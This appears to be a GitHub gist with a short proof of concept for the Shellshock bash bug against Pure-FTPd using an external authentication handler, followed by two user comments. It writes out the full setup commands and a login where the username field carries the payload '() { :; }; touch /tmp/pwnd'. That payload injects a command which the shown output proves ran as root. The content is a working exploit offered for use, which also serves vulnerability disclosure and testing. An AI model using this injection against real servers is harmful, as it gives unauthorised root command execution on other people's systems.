Skip to content

Instantly share code, notes, and snippets.

Embed
What would you like to do?
Pure-FTPd + external authentication handler #shellshock POC
$ cat > /tmp/handler.sh
#! /bin/bash
echo auth_ok:1
echo uid:42
echo gid:21
echo dir:/tmp
echo end
^D
$ chmod +x /tmp/handler.sh
# pure-authd -B -s /tmp/ftpd.sock -r /tmp/handler.sh
# pure-ftpd -B -l extauth:/tmp/ftpd.sock
$ ftp 127.0.0.1
Name: () { :; }; touch /tmp/pwnd
Password: whatever
^C
$ ls -l /tmp/pwnd
-rw------- 1 root wheel 0 Sep 27 15:28 /tmp/pwnd
@claudijd

This comment has been minimized.

Copy link

claudijd commented Sep 29, 2014

Confirmed this myself. It's legit.

@orafaelfragoso

This comment has been minimized.

Copy link

orafaelfragoso commented Jan 22, 2017

How to test this?

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
You can’t perform that action at this time.